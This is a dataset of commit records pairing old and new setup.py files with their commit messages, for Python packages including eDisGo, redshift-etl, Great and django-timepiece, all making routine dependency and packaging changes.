'dingo==0.1.0-pre+git.477bf495',
'networkx >=1.11',
'shapely >= 1.5.12, <= 1.5.12',
'pandas >=0.19.2, <=0.20.1'
],
cmdclass={
'install': InstallSetup},
dependency_links=['https://github.com/openego/dingo/archive/'\
'477bf49534f93aca90ba3c5231fe726972343939.zip'\
'#egg=dingo-0.1.0-pre+git.477bf495']
)Install with dingo version 0.1.2 | from setuptools import find_packages, setup
from setuptools.command.install import install
import os
BASEPATH='.eDisGo'
class InstallSetup(install):
def run(self):
self.create_edisgo_path()
install.run(self)
@staticmethod
def create_edisgo_path():
edisgo_path = os.path.join(os.path.expanduser('~'), BASEPATH)
data_path = os.path.join(edisgo_path, 'data')
if not os.path.isdir(edisgo_path):
os.mkdir(edisgo_path)
if not os.path.isdir(data_path):
os.mkdir(data_path)
setup(
name='eDisGo',
version='0.0.1',
packages=find_packages(),
url='https://github.com/openego/eDisGo',
license='GNU Affero General Public License v3.0',
author='gplssm, nesnoj',
author_email='',
description='A python package for distribution grid analysis and optimization',
install_requires = [
'ding0==0.1.2',
'networkx >=1.11',
'shapely >= 1.5.12, <= 1.5.12',
'pandas >=0.19.2, <=0.20.1'
],
cmdclass={
'install': InstallSetup}
) | <commit_before>from setuptools import find_packages, setup
from setuptools.command.install import install
import os
BASEPATH='.eDisGo'
class InstallSetup(install):
def run(self):
self.create_edisgo_path()
install.run(self)
@staticmethod
def create_edisgo_path():
edisgo_path = os.path.join(os.path.expanduser('~'), BASEPATH)
data_path = os.path.join(edisgo_path, 'data')
if not os.path.isdir(edisgo_path):
os.mkdir(edisgo_path)
if not os.path.isdir(data_path):
os.mkdir(data_path)
setup(
name='eDisGo',
version='0.0.1',
packages=find_packages(),
url='https://github.com/openego/eDisGo',
license='GNU Affero General Public License v3.0',
author='gplssm, nesnoj',
author_email='',
description='A python package for distribution grid analysis and optimization',
install_requires = [
'dingo==0.1.0-pre+git.477bf495',
'networkx >=1.11',
'shapely >= 1.5.12, <= 1.5.12',
'pandas >=0.19.2, <=0.20.1'
],
cmdclass={
'install': InstallSetup},
dependency_links=['https://github.com/openego/dingo/archive/'\
'477bf49534f93aca90ba3c5231fe726972343939.zip'\
'#egg=dingo-0.1.0-pre+git.477bf495']
)<commit_msg>Install with dingo version 0.1.2<commit_after> | from setuptools import find_packages, setup
from setuptools.command.install import install
import os
BASEPATH='.eDisGo'
class InstallSetup(install):
def run(self):
self.create_edisgo_path()
install.run(self)
@staticmethod
def create_edisgo_path():
edisgo_path = os.path.join(os.path.expanduser('~'), BASEPATH)
data_path = os.path.join(edisgo_path, 'data')
if not os.path.isdir(edisgo_path):
os.mkdir(edisgo_path)
if not os.path.isdir(data_path):
os.mkdir(data_path)
setup(
name='eDisGo',
version='0.0.1',
packages=find_packages(),
url='https://github.com/openego/eDisGo',
license='GNU Affero General Public License v3.0',
author='gplssm, nesnoj',
author_email='',
description='A python package for distribution grid analysis and optimization',
install_requires = [
'ding0==0.1.2',
'networkx >=1.11',
'shapely >= 1.5.12, <= 1.5.12',
'pandas >=0.19.2, <=0.20.1'
],
cmdclass={
'install': InstallSetup}
) | from setuptools import find_packages, setup
from setuptools.command.install import install
import os
BASEPATH='.eDisGo'
class InstallSetup(install):
def run(self):
self.create_edisgo_path()
install.run(self)
@staticmethod
def create_edisgo_path():
edisgo_path = os.path.join(os.path.expanduser('~'), BASEPATH)
data_path = os.path.join(edisgo_path, 'data')
if not os.path.isdir(edisgo_path):
os.mkdir(edisgo_path)
if not os.path.isdir(data_path):
os.mkdir(data_path)
setup(
name='eDisGo',
version='0.0.1',
packages=find_packages(),
url='https://github.com/openego/eDisGo',
license='GNU Affero General Public License v3.0',
author='gplssm, nesnoj',
author_email='',
description='A python package for distribution grid analysis and optimization',
install_requires = [
'dingo==0.1.0-pre+git.477bf495',
'networkx >=1.11',
'shapely >= 1.5.12, <= 1.5.12',
'pandas >=0.19.2, <=0.20.1'
],
cmdclass={
'install': InstallSetup},
dependency_links=['https://github.com/openego/dingo/archive/'\
'477bf49534f93aca90ba3c5231fe726972343939.zip'\
'#egg=dingo-0.1.0-pre+git.477bf495']
)Install with dingo version 0.1.2from setuptools import find_packages, setup
from setuptools.command.install import install
import os
BASEPATH='.eDisGo'
class InstallSetup(install):
def run(self):
self.create_edisgo_path()
install.run(self)
@staticmethod
def create_edisgo_path():
edisgo_path = os.path.join(os.path.expanduser('~'), BASEPATH)
data_path = os.path.join(edisgo_path, 'data')
if not os.path.isdir(edisgo_path):
os.mkdir(edisgo_path)
if not os.path.isdir(data_path):
os.mkdir(data_path)
setup(
name='eDisGo',
version='0.0.1',
packages=find_packages(),
url='https://github.com/openego/eDisGo',
license='GNU Affero General Public License v3.0',
author='gplssm, nesnoj',
author_email='',
description='A python package for distribution grid analysis and optimization',
install_requires = [
'ding0==0.1.2',
'networkx >=1.11',
'shapely >= 1.5.12, <= 1.5.12',
'pandas >=0.19.2, <=0.20.1'
],
cmdclass={
'install': InstallSetup}
) | <commit_before>from setuptools import find_packages, setup
from setuptools.command.install import install
import os
BASEPATH='.eDisGo'
class InstallSetup(install):
def run(self):
self.create_edisgo_path()
install.run(self)
@staticmethod
def create_edisgo_path():
edisgo_path = os.path.join(os.path.expanduser('~'), BASEPATH)
data_path = os.path.join(edisgo_path, 'data')
if not os.path.isdir(edisgo_path):
os.mkdir(edisgo_path)
if not os.path.isdir(data_path):
os.mkdir(data_path)
setup(
name='eDisGo',
version='0.0.1',
packages=find_packages(),
url='https://github.com/openego/eDisGo',
license='GNU Affero General Public License v3.0',
author='gplssm, nesnoj',
author_email='',
description='A python package for distribution grid analysis and optimization',
install_requires = [
'dingo==0.1.0-pre+git.477bf495',
'networkx >=1.11',
'shapely >= 1.5.12, <= 1.5.12',
'pandas >=0.19.2, <=0.20.1'
],
cmdclass={
'install': InstallSetup},
dependency_links=['https://github.com/openego/dingo/archive/'\
'477bf49534f93aca90ba3c5231fe726972343939.zip'\
'#egg=dingo-0.1.0-pre+git.477bf495']
)<commit_msg>Install with dingo version 0.1.2<commit_after>from setuptools import find_packages, setup
from setuptools.command.install import install
import os
BASEPATH='.eDisGo'
class InstallSetup(install):
def run(self):
self.create_edisgo_path()
install.run(self)
@staticmethod
def create_edisgo_path():
edisgo_path = os.path.join(os.path.expanduser('~'), BASEPATH)
data_path = os.path.join(edisgo_path, 'data')
if not os.path.isdir(edisgo_path):
os.mkdir(edisgo_path)
if not os.path.isdir(data_path):
os.mkdir(data_path)
setup(
name='eDisGo',
version='0.0.1',
packages=find_packages(),
url='https://github.com/openego/eDisGo',
license='GNU Affero General Public License v3.0',
author='gplssm, nesnoj',
author_email='',
description='A python package for distribution grid analysis and optimization',
install_requires = [
'ding0==0.1.2',
'networkx >=1.11',
'shapely >= 1.5.12, <= 1.5.12',
'pandas >=0.19.2, <=0.20.1'
],
cmdclass={
'install': InstallSetup}
) |
75c10d885c89cd763a065e4eb599ea5032b31fdd | setup.py | setup.py | from setuptools import find_packages, setup
setup(
name="redshift-etl",
version="0.27.0",
author="Harry's Data Engineering and Contributors",
description="ETL code to ferry data from PostgreSQL databases (or S3 files) to Redshift cluster",
license="MIT",
keywords="redshift postgresql etl extract transform load",
url="https://github.com/harrystech/harrys-redshift-etl",
package_dir={"": "python"},
packages=find_packages("python"),
package_data={
"etl": [
"assets/*",
"config/*"
]
},
scripts=[
"python/scripts/submit_arthur.sh",
"python/scripts/re_run_partial_pipeline.py"
],
entry_points={
"console_scripts": [
# NB The script must end in ".py" so that spark submit accepts it as a Python script.
"arthur.py = etl.commands:run_arg_as_command",
"run_tests.py = etl.selftest:run_tests"
]
}
)
| from setuptools import find_packages, setup
setup(
name="redshift-etl",
version="0.27.1",
author="Harry's Data Engineering and Contributors",
description="ETL code to ferry data from PostgreSQL databases (or S3 files) to Redshift cluster",
license="MIT",
keywords="redshift postgresql etl extract transform load",
url="https://github.com/harrystech/harrys-redshift-etl",
package_dir={"": "python"},
packages=find_packages("python"),
package_data={
"etl": [
"assets/*",
"config/*"
]
},
scripts=[
"python/scripts/submit_arthur.sh",
"python/scripts/re_run_partial_pipeline.py"
],
entry_points={
"console_scripts": [
# NB The script must end in ".py" so that spark submit accepts it as a Python script.
"arthur.py = etl.commands:run_arg_as_command",
"run_tests.py = etl.selftest:run_tests"
]
}
)
| Drop max-concurrency for update in refresh pipeline (invalid arg) | Drop max-concurrency for update in refresh pipeline (invalid arg)
| Python | mit | harrystech/arthur-redshift-etl,harrystech/arthur-redshift-etl,harrystech/arthur-redshift-etl,harrystech/arthur-redshift-etl,harrystech/arthur-redshift-etl | from setuptools import find_packages, setup
setup(
name="redshift-etl",
version="0.27.0",
author="Harry's Data Engineering and Contributors",
description="ETL code to ferry data from PostgreSQL databases (or S3 files) to Redshift cluster",
license="MIT",
keywords="redshift postgresql etl extract transform load",
url="https://github.com/harrystech/harrys-redshift-etl",
package_dir={"": "python"},
packages=find_packages("python"),
package_data={
"etl": [
"assets/*",
"config/*"
]
},
scripts=[
"python/scripts/submit_arthur.sh",
"python/scripts/re_run_partial_pipeline.py"
],
entry_points={
"console_scripts": [
# NB The script must end in ".py" so that spark submit accepts it as a Python script.
"arthur.py = etl.commands:run_arg_as_command",
"run_tests.py = etl.selftest:run_tests"
]
}
)
Drop max-concurrency for update in refresh pipeline (invalid arg) | from setuptools import find_packages, setup
setup(
name="redshift-etl",
version="0.27.1",
author="Harry's Data Engineering and Contributors",
description="ETL code to ferry data from PostgreSQL databases (or S3 files) to Redshift cluster",
license="MIT",
keywords="redshift postgresql etl extract transform load",
url="https://github.com/harrystech/harrys-redshift-etl",
package_dir={"": "python"},
packages=find_packages("python"),
package_data={
"etl": [
"assets/*",
"config/*"
]
},
scripts=[
"python/scripts/submit_arthur.sh",
"python/scripts/re_run_partial_pipeline.py"
],
entry_points={
"console_scripts": [
# NB The script must end in ".py" so that spark submit accepts it as a Python script.
"arthur.py = etl.commands:run_arg_as_command",
"run_tests.py = etl.selftest:run_tests"
]
}
)
| <commit_before>from setuptools import find_packages, setup
setup(
name="redshift-etl",
version="0.27.0",
author="Harry's Data Engineering and Contributors",
description="ETL code to ferry data from PostgreSQL databases (or S3 files) to Redshift cluster",
license="MIT",
keywords="redshift postgresql etl extract transform load",
url="https://github.com/harrystech/harrys-redshift-etl",
package_dir={"": "python"},
packages=find_packages("python"),
package_data={
"etl": [
"assets/*",
"config/*"
]
},
scripts=[
"python/scripts/submit_arthur.sh",
"python/scripts/re_run_partial_pipeline.py"
],
entry_points={
"console_scripts": [
# NB The script must end in ".py" so that spark submit accepts it as a Python script.
"arthur.py = etl.commands:run_arg_as_command",
"run_tests.py = etl.selftest:run_tests"
]
}
)
<commit_msg>Drop max-concurrency for update in refresh pipeline (invalid arg)<commit_after> | from setuptools import find_packages, setup
setup(
name="redshift-etl",
version="0.27.1",
author="Harry's Data Engineering and Contributors",
description="ETL code to ferry data from PostgreSQL databases (or S3 files) to Redshift cluster",
license="MIT",
keywords="redshift postgresql etl extract transform load",
url="https://github.com/harrystech/harrys-redshift-etl",
package_dir={"": "python"},
packages=find_packages("python"),
package_data={
"etl": [
"assets/*",
"config/*"
]
},
scripts=[
"python/scripts/submit_arthur.sh",
"python/scripts/re_run_partial_pipeline.py"
],
entry_points={
"console_scripts": [
# NB The script must end in ".py" so that spark submit accepts it as a Python script.
"arthur.py = etl.commands:run_arg_as_command",
"run_tests.py = etl.selftest:run_tests"
]
}
)
| from setuptools import find_packages, setup
setup(
name="redshift-etl",
version="0.27.0",
author="Harry's Data Engineering and Contributors",
description="ETL code to ferry data from PostgreSQL databases (or S3 files) to Redshift cluster",
license="MIT",
keywords="redshift postgresql etl extract transform load",
url="https://github.com/harrystech/harrys-redshift-etl",
package_dir={"": "python"},
packages=find_packages("python"),
package_data={
"etl": [
"assets/*",
"config/*"
]
},
scripts=[
"python/scripts/submit_arthur.sh",
"python/scripts/re_run_partial_pipeline.py"
],
entry_points={
"console_scripts": [
# NB The script must end in ".py" so that spark submit accepts it as a Python script.
"arthur.py = etl.commands:run_arg_as_command",
"run_tests.py = etl.selftest:run_tests"
]
}
)
Drop max-concurrency for update in refresh pipeline (invalid arg)from setuptools import find_packages, setup
setup(
name="redshift-etl",
version="0.27.1",
author="Harry's Data Engineering and Contributors",
description="ETL code to ferry data from PostgreSQL databases (or S3 files) to Redshift cluster",
license="MIT",
keywords="redshift postgresql etl extract transform load",
url="https://github.com/harrystech/harrys-redshift-etl",
package_dir={"": "python"},
packages=find_packages("python"),
package_data={
"etl": [
"assets/*",
"config/*"
]
},
scripts=[
"python/scripts/submit_arthur.sh",
"python/scripts/re_run_partial_pipeline.py"
],
entry_points={
"console_scripts": [
# NB The script must end in ".py" so that spark submit accepts it as a Python script.
"arthur.py = etl.commands:run_arg_as_command",
"run_tests.py = etl.selftest:run_tests"
]
}
)
| <commit_before>from setuptools import find_packages, setup
setup(
name="redshift-etl",
version="0.27.0",
author="Harry's Data Engineering and Contributors",
description="ETL code to ferry data from PostgreSQL databases (or S3 files) to Redshift cluster",
license="MIT",
keywords="redshift postgresql etl extract transform load",
url="https://github.com/harrystech/harrys-redshift-etl",
package_dir={"": "python"},
packages=find_packages("python"),
package_data={
"etl": [
"assets/*",
"config/*"
]
},
scripts=[
"python/scripts/submit_arthur.sh",
"python/scripts/re_run_partial_pipeline.py"
],
entry_points={
"console_scripts": [
# NB The script must end in ".py" so that spark submit accepts it as a Python script.
"arthur.py = etl.commands:run_arg_as_command",
"run_tests.py = etl.selftest:run_tests"
]
}
)
<commit_msg>Drop max-concurrency for update in refresh pipeline (invalid arg)<commit_after>from setuptools import find_packages, setup
setup(
name="redshift-etl",
version="0.27.1",
author="Harry's Data Engineering and Contributors",
description="ETL code to ferry data from PostgreSQL databases (or S3 files) to Redshift cluster",
license="MIT",
keywords="redshift postgresql etl extract transform load",
url="https://github.com/harrystech/harrys-redshift-etl",
package_dir={"": "python"},
packages=find_packages("python"),
package_data={
"etl": [
"assets/*",
"config/*"
]
},
scripts=[
"python/scripts/submit_arthur.sh",
"python/scripts/re_run_partial_pipeline.py"
],
entry_points={
"console_scripts": [
# NB The script must end in ".py" so that spark submit accepts it as a Python script.
"arthur.py = etl.commands:run_arg_as_command",
"run_tests.py = etl.selftest:run_tests"
]
}
)
|
67cb72b37ce0e68ceee7943295934f1d1fda179e | setup.py | setup.py | import os
from setuptools import find_packages, setup
from great import __url__
with open(os.path.join(os.path.dirname(__file__), "README.rst")) as readme:
long_description = readme.read()
classifiers = [
"Development Status :: 3 - Alpha",
"License :: OSI Approved :: MIT License",
"Operating System :: OS Independent",
"Programming Language :: Python",
"Programming Language :: Python :: 2.7",
"Programming Language :: Python :: 2",
"Programming Language :: Python :: Implementation :: CPython",
"Programming Language :: Python :: Implementation :: PyPy"
]
setup(
name="great",
packages=find_packages(),
setup_requires=["setuptools_scm"],
use_scm_version=True,
install_requires=[
"Alchimia",
"appdirs",
"attrs",
"filesystems",
"hyperlink",
"Minion",
"pytoml",
"SQLAlchemy",
"Twisted",
"txmusicbrainz",
],
author="Julian Berman",
author_email="Julian@GrayVines.com",
classifiers=classifiers,
description="A ratings aggregator",
license="MIT",
long_description=long_description,
url=__url__,
)
| import os
from setuptools import find_packages, setup
from great import __url__
with open(os.path.join(os.path.dirname(__file__), "README.rst")) as readme:
long_description = readme.read()
classifiers = [
"Development Status :: 3 - Alpha",
"License :: OSI Approved :: MIT License",
"Operating System :: OS Independent",
"Programming Language :: Python",
"Programming Language :: Python :: 2.7",
"Programming Language :: Python :: 2",
"Programming Language :: Python :: Implementation :: CPython",
"Programming Language :: Python :: Implementation :: PyPy"
]
setup(
name="great",
packages=find_packages() + ["twisted.plugins"],
setup_requires=["setuptools_scm"],
use_scm_version=True,
install_requires=[
"Alchimia",
"appdirs",
"attrs",
"filesystems",
"hyperlink",
"Minion",
"pytoml",
"SQLAlchemy",
"Twisted",
"txmusicbrainz",
],
author="Julian Berman",
author_email="Julian@GrayVines.com",
classifiers=classifiers,
description="A ratings aggregator",
license="MIT",
long_description=long_description,
url=__url__,
)
| Make sure to install the tap. | Make sure to install the tap.
| Python | mit | Julian/Great,Julian/Great,Julian/Great | import os
from setuptools import find_packages, setup
from great import __url__
with open(os.path.join(os.path.dirname(__file__), "README.rst")) as readme:
long_description = readme.read()
classifiers = [
"Development Status :: 3 - Alpha",
"License :: OSI Approved :: MIT License",
"Operating System :: OS Independent",
"Programming Language :: Python",
"Programming Language :: Python :: 2.7",
"Programming Language :: Python :: 2",
"Programming Language :: Python :: Implementation :: CPython",
"Programming Language :: Python :: Implementation :: PyPy"
]
setup(
name="great",
packages=find_packages(),
setup_requires=["setuptools_scm"],
use_scm_version=True,
install_requires=[
"Alchimia",
"appdirs",
"attrs",
"filesystems",
"hyperlink",
"Minion",
"pytoml",
"SQLAlchemy",
"Twisted",
"txmusicbrainz",
],
author="Julian Berman",
author_email="Julian@GrayVines.com",
classifiers=classifiers,
description="A ratings aggregator",
license="MIT",
long_description=long_description,
url=__url__,
)
Make sure to install the tap. | import os
from setuptools import find_packages, setup
from great import __url__
with open(os.path.join(os.path.dirname(__file__), "README.rst")) as readme:
long_description = readme.read()
classifiers = [
"Development Status :: 3 - Alpha",
"License :: OSI Approved :: MIT License",
"Operating System :: OS Independent",
"Programming Language :: Python",
"Programming Language :: Python :: 2.7",
"Programming Language :: Python :: 2",
"Programming Language :: Python :: Implementation :: CPython",
"Programming Language :: Python :: Implementation :: PyPy"
]
setup(
name="great",
packages=find_packages() + ["twisted.plugins"],
setup_requires=["setuptools_scm"],
use_scm_version=True,
install_requires=[
"Alchimia",
"appdirs",
"attrs",
"filesystems",
"hyperlink",
"Minion",
"pytoml",
"SQLAlchemy",
"Twisted",
"txmusicbrainz",
],
author="Julian Berman",
author_email="Julian@GrayVines.com",
classifiers=classifiers,
description="A ratings aggregator",
license="MIT",
long_description=long_description,
url=__url__,
)
| <commit_before>import os
from setuptools import find_packages, setup
from great import __url__
with open(os.path.join(os.path.dirname(__file__), "README.rst")) as readme:
long_description = readme.read()
classifiers = [
"Development Status :: 3 - Alpha",
"License :: OSI Approved :: MIT License",
"Operating System :: OS Independent",
"Programming Language :: Python",
"Programming Language :: Python :: 2.7",
"Programming Language :: Python :: 2",
"Programming Language :: Python :: Implementation :: CPython",
"Programming Language :: Python :: Implementation :: PyPy"
]
setup(
name="great",
packages=find_packages(),
setup_requires=["setuptools_scm"],
use_scm_version=True,
install_requires=[
"Alchimia",
"appdirs",
"attrs",
"filesystems",
"hyperlink",
"Minion",
"pytoml",
"SQLAlchemy",
"Twisted",
"txmusicbrainz",
],
author="Julian Berman",
author_email="Julian@GrayVines.com",
classifiers=classifiers,
description="A ratings aggregator",
license="MIT",
long_description=long_description,
url=__url__,
)
<commit_msg>Make sure to install the tap.<commit_after> | import os
from setuptools import find_packages, setup
from great import __url__
with open(os.path.join(os.path.dirname(__file__), "README.rst")) as readme:
long_description = readme.read()
classifiers = [
"Development Status :: 3 - Alpha",
"License :: OSI Approved :: MIT License",
"Operating System :: OS Independent",
"Programming Language :: Python",
"Programming Language :: Python :: 2.7",
"Programming Language :: Python :: 2",
"Programming Language :: Python :: Implementation :: CPython",
"Programming Language :: Python :: Implementation :: PyPy"
]
setup(
name="great",
packages=find_packages() + ["twisted.plugins"],
setup_requires=["setuptools_scm"],
use_scm_version=True,
install_requires=[
"Alchimia",
"appdirs",
"attrs",
"filesystems",
"hyperlink",
"Minion",
"pytoml",
"SQLAlchemy",
"Twisted",
"txmusicbrainz",
],
author="Julian Berman",
author_email="Julian@GrayVines.com",
classifiers=classifiers,
description="A ratings aggregator",
license="MIT",
long_description=long_description,
url=__url__,
)
| import os
from setuptools import find_packages, setup
from great import __url__
with open(os.path.join(os.path.dirname(__file__), "README.rst")) as readme:
long_description = readme.read()
classifiers = [
"Development Status :: 3 - Alpha",
"License :: OSI Approved :: MIT License",
"Operating System :: OS Independent",
"Programming Language :: Python",
"Programming Language :: Python :: 2.7",
"Programming Language :: Python :: 2",
"Programming Language :: Python :: Implementation :: CPython",
"Programming Language :: Python :: Implementation :: PyPy"
]
setup(
name="great",
packages=find_packages(),
setup_requires=["setuptools_scm"],
use_scm_version=True,
install_requires=[
"Alchimia",
"appdirs",
"attrs",
"filesystems",
"hyperlink",
"Minion",
"pytoml",
"SQLAlchemy",
"Twisted",
"txmusicbrainz",
],
author="Julian Berman",
author_email="Julian@GrayVines.com",
classifiers=classifiers,
description="A ratings aggregator",
license="MIT",
long_description=long_description,
url=__url__,
)
Make sure to install the tap.import os
from setuptools import find_packages, setup
from great import __url__
with open(os.path.join(os.path.dirname(__file__), "README.rst")) as readme:
long_description = readme.read()
classifiers = [
"Development Status :: 3 - Alpha",
"License :: OSI Approved :: MIT License",
"Operating System :: OS Independent",
"Programming Language :: Python",
"Programming Language :: Python :: 2.7",
"Programming Language :: Python :: 2",
"Programming Language :: Python :: Implementation :: CPython",
"Programming Language :: Python :: Implementation :: PyPy"
]
setup(
name="great",
packages=find_packages() + ["twisted.plugins"],
setup_requires=["setuptools_scm"],
use_scm_version=True,
install_requires=[
"Alchimia",
"appdirs",
"attrs",
"filesystems",
"hyperlink",
"Minion",
"pytoml",
"SQLAlchemy",
"Twisted",
"txmusicbrainz",
],
author="Julian Berman",
author_email="Julian@GrayVines.com",
classifiers=classifiers,
description="A ratings aggregator",
license="MIT",
long_description=long_description,
url=__url__,
)
| <commit_before>import os
from setuptools import find_packages, setup
from great import __url__
with open(os.path.join(os.path.dirname(__file__), "README.rst")) as readme:
long_description = readme.read()
classifiers = [
"Development Status :: 3 - Alpha",
"License :: OSI Approved :: MIT License",
"Operating System :: OS Independent",
"Programming Language :: Python",
"Programming Language :: Python :: 2.7",
"Programming Language :: Python :: 2",
"Programming Language :: Python :: Implementation :: CPython",
"Programming Language :: Python :: Implementation :: PyPy"
]
setup(
name="great",
packages=find_packages(),
setup_requires=["setuptools_scm"],
use_scm_version=True,
install_requires=[
"Alchimia",
"appdirs",
"attrs",
"filesystems",
"hyperlink",
"Minion",
"pytoml",
"SQLAlchemy",
"Twisted",
"txmusicbrainz",
],
author="Julian Berman",
author_email="Julian@GrayVines.com",
classifiers=classifiers,
description="A ratings aggregator",
license="MIT",
long_description=long_description,
url=__url__,
)
<commit_msg>Make sure to install the tap.<commit_after>import os
from setuptools import find_packages, setup
from great import __url__
with open(os.path.join(os.path.dirname(__file__), "README.rst")) as readme:
long_description = readme.read()
classifiers = [
"Development Status :: 3 - Alpha",
"License :: OSI Approved :: MIT License",
"Operating System :: OS Independent",
"Programming Language :: Python",
"Programming Language :: Python :: 2.7",
"Programming Language :: Python :: 2",
"Programming Language :: Python :: Implementation :: CPython",
"Programming Language :: Python :: Implementation :: PyPy"
]
setup(
name="great",
packages=find_packages() + ["twisted.plugins"],
setup_requires=["setuptools_scm"],
use_scm_version=True,
install_requires=[
"Alchimia",
"appdirs",
"attrs",
"filesystems",
"hyperlink",
"Minion",
"pytoml",
"SQLAlchemy",
"Twisted",
"txmusicbrainz",
],
author="Julian Berman",
author_email="Julian@GrayVines.com",
classifiers=classifiers,
description="A ratings aggregator",
license="MIT",
long_description=long_description,
url=__url__,
)
|
5d5d55c80b6067e6e785a5b4578124a6759a1cfd | setup.py | setup.py | from setuptools import setup, find_packages
setup(
name='django-timepiece',
version=__import__('timepiece').__version__,
author='Caktus Consulting Group',
author_email='solutions@caktusgroup.com',
packages=find_packages(exclude=['example_project']),
include_package_data=True,
url='https://github.com/caktus/django-timepiece',
license='BSD',
long_description=open('README.rst').read(),
zip_safe=False, # because we're including media that Django needs
description="django-timepiece is a multi-user application for tracking "
"people's time on projects.",
classifiers=[
'Topic :: Internet :: WWW/HTTP :: Dynamic Content',
'Intended Audience :: Developers',
'License :: OSI Approved :: BSD License',
'Programming Language :: Python',
'Topic :: Software Development :: Libraries :: Python Modules',
'Development Status :: 4 - Beta',
'Operating System :: OS Independent',
],
install_requires = [
"python-dateutil==1.5",
"django-ajax-selects==1.1.4",
"django-pagination==1.0.7",
"textile==2.1.4",
"django-selectable==0.2.0",
],
)
| from setuptools import setup, find_packages
setup(
name='django-timepiece',
version=__import__('timepiece').__version__,
author='Caktus Consulting Group',
author_email='solutions@caktusgroup.com',
packages=find_packages(exclude=['example_project']),
include_package_data=True,
url='https://github.com/caktus/django-timepiece',
license='BSD',
long_description=open('README.rst').read(),
zip_safe=False, # because we're including media that Django needs
description="django-timepiece is a multi-user application for tracking "
"people's time on projects.",
classifiers=[
'Topic :: Internet :: WWW/HTTP :: Dynamic Content',
'Intended Audience :: Developers',
'License :: OSI Approved :: BSD License',
'Programming Language :: Python',
'Topic :: Software Development :: Libraries :: Python Modules',
'Development Status :: 4 - Beta',
'Operating System :: OS Independent',
],
install_requires = [
"python-dateutil==1.5",
"django-ajax-selects==1.1.4",
"django-pagination==1.0.7",
"django-selectable==0.2.0",
],
)
| Remove textile requirement from install_requires | Remove textile requirement from install_requires | Python | mit | dannybrowne86/django-timepiece,BocuStudio/django-timepiece,gaga3966/django-timepiece,caktus/django-timepiece,dannybrowne86/django-timepiece,BocuStudio/django-timepiece,arbitrahj/django-timepiece,josesanch/django-timepiece,dannybrowne86/django-timepiece,caktus/django-timepiece,caktus/django-timepiece,gaga3966/django-timepiece,gaga3966/django-timepiece,josesanch/django-timepiece,arbitrahj/django-timepiece,BocuStudio/django-timepiece,josesanch/django-timepiece,arbitrahj/django-timepiece | from setuptools import setup, find_packages
setup(
name='django-timepiece',
version=__import__('timepiece').__version__,
author='Caktus Consulting Group',
author_email='solutions@caktusgroup.com',
packages=find_packages(exclude=['example_project']),
include_package_data=True,
url='https://github.com/caktus/django-timepiece',
license='BSD',
long_description=open('README.rst').read(),
zip_safe=False, # because we're including media that Django needs
description="django-timepiece is a multi-user application for tracking "
"people's time on projects.",
classifiers=[
'Topic :: Internet :: WWW/HTTP :: Dynamic Content',
'Intended Audience :: Developers',
'License :: OSI Approved :: BSD License',
'Programming Language :: Python',
'Topic :: Software Development :: Libraries :: Python Modules',
'Development Status :: 4 - Beta',
'Operating System :: OS Independent',
],
install_requires = [
"python-dateutil==1.5",
"django-ajax-selects==1.1.4",
"django-pagination==1.0.7",
"textile==2.1.4",
"django-selectable==0.2.0",
],
)
Remove textile requirement from install_requires | from setuptools import setup, find_packages
setup(
name='django-timepiece',
version=__import__('timepiece').__version__,
author='Caktus Consulting Group',
author_email='solutions@caktusgroup.com',
packages=find_packages(exclude=['example_project']),
include_package_data=True,
url='https://github.com/caktus/django-timepiece',
license='BSD',
long_description=open('README.rst').read(),
zip_safe=False, # because we're including media that Django needs
description="django-timepiece is a multi-user application for tracking "
"people's time on projects.",
classifiers=[
'Topic :: Internet :: WWW/HTTP :: Dynamic Content',
'Intended Audience :: Developers',
'License :: OSI Approved :: BSD License',
'Programming Language :: Python',
'Topic :: Software Development :: Libraries :: Python Modules',
'Development Status :: 4 - Beta',
'Operating System :: OS Independent',
],
install_requires = [
"python-dateutil==1.5",
"django-ajax-selects==1.1.4",
"django-pagination==1.0.7",
"django-selectable==0.2.0",
],
)
| <commit_before>from setuptools import setup, find_packages
setup(
name='django-timepiece',
version=__import__('timepiece').__version__,
author='Caktus Consulting Group',
author_email='solutions@caktusgroup.com',
packages=find_packages(exclude=['example_project']),
include_package_data=True,
url='https://github.com/caktus/django-timepiece',
license='BSD',
long_description=open('README.rst').read(),
zip_safe=False, # because we're including media that Django needs
description="django-timepiece is a multi-user application for tracking "
"people's time on projects.",
classifiers=[
'Topic :: Internet :: WWW/HTTP :: Dynamic Content',
'Intended Audience :: Developers',
'License :: OSI Approved :: BSD License',
'Programming Language :: Python',
'Topic :: Software Development :: Libraries :: Python Modules',
'Development Status :: 4 - Beta',
'Operating System :: OS Independent',
],
install_requires = [
"python-dateutil==1.5",
"django-ajax-selects==1.1.4",
"django-pagination==1.0.7",
"textile==2.1.4",
"django-selectable==0.2.0",
],
)
<commit_msg>Remove textile requirement from install_requires<commit_after> | from setuptools import setup, find_packages
setup(
name='django-timepiece',
version=__import__('timepiece').__version__,
author='Caktus Consulting Group',
author_email='solutions@caktusgroup.com',
packages=find_packages(exclude=['example_project']),
include_package_data=True,
url='https://github.com/caktus/django-timepiece',
license='BSD',
long_description=open('README.rst').read(),
zip_safe=False, # because we're including media that Django needs
description="django-timepiece is a multi-user application for tracking "
"people's time on projects.",
classifiers=[
'Topic :: Internet :: WWW/HTTP :: Dynamic Content',
'Intended Audience :: Developers',
'License :: OSI Approved :: BSD License',
'Programming Language :: Python',
'Topic :: Software Development :: Libraries :: Python Modules',
'Development Status :: 4 - Beta',
'Operating System :: OS Independent',
],
install_requires = [
"python-dateutil==1.5",
"django-ajax-selects==1.1.4",
"django-pagination==1.0.7",
"django-selectable==0.2.0",
],
)
| from setuptools import setup, find_packages
setup(
name='django-timepiece',
version=__import__('timepiece').__version__,
author='Caktus Consulting Group',
author_email='solutions@caktusgroup.com',
packages=find_packages(exclude=['example_project']),
include_package_data=True,
url='https://github.com/caktus/django-timepiece',
license='BSD',
long_description=open('README.rst').read(),
zip_safe=False, # because we're including media that Django needs
description="django-timepiece is a multi-user application for tracking "
"people's time on projects.",
classifiers=[
'Topic :: Internet :: WWW/HTTP :: Dynamic Content',
'Intended Audience :: Developers',
'License :: OSI Approved :: BSD License',
'Programming Language :: Python',
'Topic :: Software Development :: Libraries :: Python Modules',
'Development Status :: 4 - Beta',
'Operating System :: OS Independent',
],
install_requires = [
"python-dateutil==1.5",
"django-ajax-selects==1.1.4",
"django-pagination==1.0.7",
"textile==2.1.4",
"django-selectable==0.2.0",
],
)
Remove textile requirement from install_requiresfrom setuptools import setup, find_packages
setup(
name='django-timepiece',
version=__import__('timepiece').__version__,
author='Caktus Consulting Group',
